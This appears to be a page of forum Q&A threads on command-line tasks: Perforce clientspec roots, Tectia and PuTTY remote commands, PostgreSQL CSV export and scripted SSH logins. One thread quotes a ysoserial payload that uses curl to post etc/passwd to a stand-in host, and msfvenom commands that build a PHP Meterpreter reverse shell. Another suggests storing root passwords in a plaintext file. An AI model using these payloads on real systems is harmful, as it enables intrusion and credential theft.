How to change the root of a clientspec from the command line

I have created a new clientspec using the command:
p4 client abc
where abc is the name of my clientspec.
Now I want to change the root of this clientspec.
Can somebody please tell me how I can change the root of this clientspec without explicitly editing the client file (i.e. by using some command)?
And is there any option for specifying the root path while creating or setting the client (through the command line)?

Here are some tips:
When creating a new client spec, you can seed the Root field by using the -d global option, e.g.:
p4 -d /this/is/the/client/root client NewClientName
You can also pipe the output of 'p4 client -o' to 'p4 client -i' to create or modify a client spec without having to open an editor, e.g.:
p4 -d /this/is/the/client/root client -o NewClientName | p4 client -i
The p4 -d trick won't do anything to replace the Root field in an existing client spec, however. For that, you need an inline filter, something like this:
p4 client -o ExistingClientName | sed -e '/Root:/ s,.*,Root: /new/root/path,' | p4 client -i
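For a reusable version of that filter, here is a minimal sketch; the client name and new root below are placeholders, and the sed pattern assumes the default spec layout:
CLIENT=ExistingClientName
NEW_ROOT=/new/root/path
p4 client -o "$CLIENT" | sed -e "s,^Root:.*,Root: $NEW_ROOT," | p4 client -i
p4 client -o "$CLIENT" | grep '^Root:'    # confirm the field was updated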

This is how you change the root of an existing client spec using a PowerShell script:
$p4ClientSpec = p4 client -o "$env:COMPUTERNAME"
$p4ClientSpec = $p4ClientSpec -replace '^Root:.+$', "Root: D:\test"
$p4ClientSpec | p4 client -i

My setup:
macOS 10.14
p4 2019.1
None of the existing answers worked for me.
I had to run the following in Terminal:
p4 client my-client
then edit the root path directly in the text editor that opens and save the spec.
After that, all is OK.
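If you'd rather not use the default editor for this, a small sketch (P4EDITOR is the standard Perforce variable for this; nano is just an example):
export P4EDITOR=nano    # tell p4 which editor to open for spec forms
p4 client my-client     # edit the Root: field in the editor, then save and quit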

Related

SSH tectia, how to run batch commands?

I have a Tectia SSH server in a Windows environment.
When I use sftpg3 -B cmd.txt username@host, that works fine. The only problem is that it doesn't let me execute files remotely, it only lets me move files. It reads the commands from cmd.txt, but since I can't execute anything it ignores those commands.
But when I do the same thing with sshg3, it doesn't recognize the -B flag at all:
sshg3 -B cmd.txt username@host
cmd.txt' is not recognized as an internal or external command,
operable program or batch file.
I've tried putting -B "cmd.txt"
I tried just putting the cmd.txt contents in the same script instead of housing them in cmd.txt and getting rid of -B, but it doesn't run them that way either.
The docs don't have much to go on. All they say is to use -B for batch processing.
Contents of cmd.txt:
D:
cd Library
cd Backup
parseLibrary.cmd
exit
I'm trying to sshg3 into a host, navigate to a path and run a batch file on that host.
Any ideas?
-B, --batch-mode
Uses batch mode. Fails authentication if it requires user interaction on the terminal.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
It does use public-key authentication; there is no user interaction needed on the terminal.
Noticed this on the docs for sftpg3
-B [ - | batch_file ]
The -B - option enables reading from the standard input. This option is useful when you want to launch processes with sftpg3 and redirect the stdin pipes.
By defining the name of a batch_file as an attribute, you can execute SFTP commands from the given file in batch mode. The file can contain any allowed SFTP commands. For a description of the commands, see the section called “Commands”.
Using batch mode requires that you have previously saved the server host key on the client and set up a non-interactive method for user authentication (for example, host-based authentication or public-key authentication without a passphrase).
I'm guessing batch file is different than batch mode?
I figured it out. You have to use the -B flag for every command you want to execute.
sshg3 user@host -B dir -B ipconfig -B etc.cmd
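Applied to the original cmd.txt, a minimal sketch might look like this (this assumes the remote shell is cmd.exe and that each -B entry runs as an independent command, so the drive/directory change and the script call are collapsed into one entry):
sshg3 user@host -B "cd /d D:\Library\Backup && parseLibrary.cmd"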

Can't launch putty with remote command?

I'm attempting to launch PuTTY via the command line in such a way that it runs a command on the server (I want to create a Windows shortcut to tail a log file).
So far I have a batch file containing this:
"C:\Program Files (x86)\PuTTY\putty.exe" -ssh -t -pw -m tail_catalina_out -load "myprofile"
And on my server I have a file in the root directory named tail_catalina_out with the following contents:
tail -f /opt/tomcat/logs/catalina.out
PuTTY launches and my session starts successfully, but no command appears to be carried out. Am I misunderstanding how this works?
You don't need -ssh with -load profile (and if you use a nonstandard port like my test it doesn't work at all); in fact you don't need it with [user@]host either, because it's the default.
-pw -m tail_catalina_out uses -m as your password (which I hope is incorrect, so you should be reprompted unless public-key auth is set up) and ignores tail_catalina_out.
The file for -m must be local, i.e. on the PuTTY machine, not on the server (although the commands in it will be sent to, and must be valid on, the server).
Thus: "\path\to\putty" -t -m localcmdfile -load profile
You could also use plink which runs in the console and takes either -m localfile or the actual remote command on the command line after the last option (like the OpenSSH client ssh):
"\path\to\plink" -t -load profile tail -f remotefile
As usual, you can omit the quotes around the path if it contains no space. Personally I use \progra~2 instead of bothering with "\program files (x86)" but that's just me, and it may depend on a clean install (instead of upgrade).
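Putting that together for the shortcut in the question, a sketch (the local path to tail_catalina_out is a placeholder; the file must sit on the Windows machine and contain the tail command shown above):
"C:\Program Files (x86)\PuTTY\putty.exe" -t -m "C:\path\to\tail_catalina_out" -load "myprofile"
rem or, with plink, pass the remote command directly:
"C:\Program Files (x86)\PuTTY\plink.exe" -t -load "myprofile" tail -f /opt/tomcat/logs/catalina.out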

How to pass a file when generating a Metasploit shell?

I want to pass a file when generating a Metasploit shell. It is like this:
java -jar ysoserial.jar CommonsCollections1 "curl -X POST -F file=@etc/passwd axample.com" | base64
Like -F file in that example, I want to pass a file in this command:
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
This is the command where I want to pass a file. My file is a payload file (etc/payload). I don't know the command for doing this. I tried to find a tutorial, but couldn't.
As I understand it, you are using the msfvenom tool to generate a Meterpreter payload - the program that will run on the target host (in this case it will give you a command shell on the target host).
This payload is part of the Metasploit Framework - a predefined program, not your custom script - and you want to pass your file to it. Whether that is possible depends entirely on which parameters the Meterpreter payload accepts, and it seems there is no option to simply pass an arbitrary file to Meterpreter.
In the curl example, the -F option is recognized by the cURL application: it stands for HTTP form posting and tells the web server to accept a file upload under the form field named file.
But what file path do you want to pass to the Meterpreter payload, and what is your final goal? As it stands, it does not make much sense.
UPDATE for your comment
curl is a different application with its own -F option format. With msfvenom, to pass a variable such as CUSTOM1, use the following form:
msfvenom -p <payload> LHOST=<...> LPORT=<...> CUSTOM1=<...> ...
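For instance, a hypothetical invocation with the file path from the question (the LHOST/LPORT values are placeholders, and CUSTOM1 only has an effect if the chosen payload actually reads that option, as described above):
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.0.2.10 LPORT=4444 CUSTOM1=etc/payload -f raw > shell.php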

PostgreSQL export result as CSV from remote server

I have read all the other solutions and none fits my needs: I do not use Java, I do not have superuser rights and I do not have any APIs installed on my server.
I have select rights on a remote PostgreSQL server and I want to run a query on it remotely and export the results into a .csv file on my local server.
Once I manage to establish the connection to the server, I first have to specify the DB, then the schema and then the table, which is why the following lines of code do not work:
\copy schema.products TO '/home/localfolder/products.csv' CSV DELIMITER ','
copy (Select * From schema.products) To '/home/localfolder/products.csv' With CSV;
I have also tried the following bash command:
psql -d DB -c "select * from schema.products;" > /home/localfolder/products.csv
which failed with the following error:
-bash: home/localfolder/products.csv: No such file or directory
I would really appreciate it if someone could shed some light on this.
Have you tried this? I do not have psql right now to test it.
echo "COPY (SELECT * from schema.products) TO STDOUT with CSV HEADER" | psql -o '/home/localfolder/products.csv'
Details:
-o filename: put all output into file filename. The path must be writable by the client.
The echo builtin plus a pipe (|) passes the command to psql.
After a while a good colleague devised this solution, which worked perfectly for my needs; hope this can help someone.
ssh -l user [remote host] -p [port] 'psql -c "copy (select * from schema.table_name) to STDOUT csv header" -d DB' > /home/localfolder/products.csv
Very similar to idobr's answer.
From http://www.postgresql.org/docs/current/static/sql-copy.html:
Files named in a COPY command are read or written directly by the server, not by the client application.
So, you'll always want to use psql's \copy meta command.
The following should do the trick:
\copy (SELECT * FROM schema.products) to 'products.csv' with csv
If the above doesn't work, we'll need an error/warning message to work with.
You mentioned that the server is remote; however, you are connecting to localhost. Add -h [server here] or set the environment variable:
export PGHOST='[server here]'
The database name should be the last argument, not passed with -d.
And finally, that command should not have failed; my guess is that the directory does not exist. Either create it or try writing to /tmp.
I would ask you to try the following command:
psql -h [server here] -c "copy (select * from schema.products) to STDOUT csv header" DB > /tmp/products.csv
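Combining those points with the \copy approach from the earlier answer, a minimal sketch (host, port, user and output path are placeholders, and /home/localfolder must already exist on the local machine):
psql -h remote.example.com -p 5432 -U myuser -c "\copy (SELECT * FROM schema.products) TO '/home/localfolder/products.csv' WITH CSV HEADER" DB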

Bash: How to use a secret file for a script?

I've created a really long script which fully automates the installation and configuration of a web server in my company. During its runtime the script accesses a remote server using scp and ssh in order to download configuration files, and I'd like to have a secret file which holds the password (it's always the same password) so that the script can use this file without me having to enter the password manually. Some lines from the script look like this:
/usr/bin/scp root@192.168.1.10:/etc/mail/sendmail.cf /etc/mail/
/usr/bin/scp -r root@192.168.1.10:/etc/yum.repos.d /etc/
/usr/bin/ssh root@192.168.1.10 'rpm -qa --queryformat "%{NAME}\n" >/tmp/sw.lst'
/usr/bin/scp root@192.168.1.10:/tmp/sw.lst /tmp/
/usr/bin/xargs yum -y install < /tmp/sw.lst
I know about the ssh-keygen and ssh-copy-id method, but the problem is that the script will run on a different machine every time and I don't want to exchange keys before each run.
When I had to do something like that, I used expect and a wrapper script that would fetch a password from a file.
I.e. in my password file I'd have something like
root@192.168.1.10 ThisIsMyPass
user@localhost thisIsMyOtherPass
and then have the wrapper script fetch it (it could be as simple as grep "root@192.168.1.10" ~/.passwords | cut -d ' ' -f2).
I'm guessing there are more appropriate methods, but with this one you only need to keep your wrapper and password file protected, and you can make your setup script public.
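A rough sketch of that wrapper idea for one of the scp lines above (the password file location, its format and the use of a here-document are assumptions):
#!/bin/bash
# look up the password for the remote host in the protected password file
PASS=$(grep "root@192.168.1.10" ~/.passwords | cut -d ' ' -f2)
# drive scp with expect so the password is supplied non-interactively
expect <<EOF
spawn /usr/bin/scp root@192.168.1.10:/etc/mail/sendmail.cf /etc/mail/
expect "password:"
send "$PASS\r"
expect eof
EOF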
